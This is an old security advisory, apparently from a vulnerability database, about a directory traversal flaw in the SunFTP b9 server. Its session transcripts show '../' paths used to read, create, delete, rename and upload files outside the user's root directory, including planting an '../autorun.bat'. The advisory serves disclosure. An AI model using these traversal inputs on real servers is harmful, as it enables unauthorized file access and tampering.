Sunftp build9(1) - ftp server Vulnerability

2001-03-03T00:00:00
ID SECURITYVULNS:DOC:1343
Type securityvulns
Reporter Securityvulns
Modified 2001-03-03T00:00:00

Description

It is possible to break out of the root directory by using relative paths

e:\crap was used as homedir. of user test.

the get command

getting files from outside of the root dir.

220 chris FTP Server (SunFTP b9) ready on port 21... Benutzer (10.17.3.44:(none)): test 331 Password required for test. Kennwort: 230 User test logged in. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt 226 File sent ok FTP: 179 Bytes empfangen in 0,00Sekunden 179000,00KB/s ftp> cd .. 501 CWD failed. No permission ftp> get ../sunftptest.txt 200 Port command successful. 150 Opening data connection for ../sunftptest.txt. 226 File sent ok FTP: 1443 Bytes empfangen in 0,00Sekunden 1443000,00KB/s

the mkdir command

without priv. to create directories:

ftp> mkdir test 550 '/test': can't create directory. ftp> mkdir ../test 257 '/../test': directory created.

hell!it's getting worse...

the rmdir command

without any priv. to remove anything

ftp> rmdir ../test 250 '/../test': directory removed.

this only works with empty directories

the rename command

it is possible to rename files outside of the root directory without permissions.And it is also possible to move files with the rename command, when the filename is known.

ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test 226 File sent ok FTP: 240 Bytes empfangen in 0,00Sekunden 240000,00KB/s ftp> cd .. 501 CWD failed. No permission ftp> rename ../sunftptest.txt movedtohomedir.txt 350 File exists, ready for destination name. 250 File '/../sunftptest.txt' renamed to '/movedtohomedir.txt'. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt 226 File sent ok FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s

the put command

If you have permission to upload files, you can put these files outside of the homedir.

ftp> dir 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 . drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .. -rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test -rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt 226 File sent ok FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s ftp> put Lokale Datei c:\test.txt Remotedatei test.txt 200 Port command successful. 150 Opening data connection for test.txt. 226 File received ok ftp> put Lokale Datei c:\test.txt Remotedatei ../autorun.bat 200 Port command successful. 150 Opening data connection for ../autorun.bat. 226 File received ok

Solution

no quick bugfix. Use with care

I tried to contact the authors, but their webpage seems to be down.

se00020@lion.cc or se00020@fhs-hagenberg.ac.at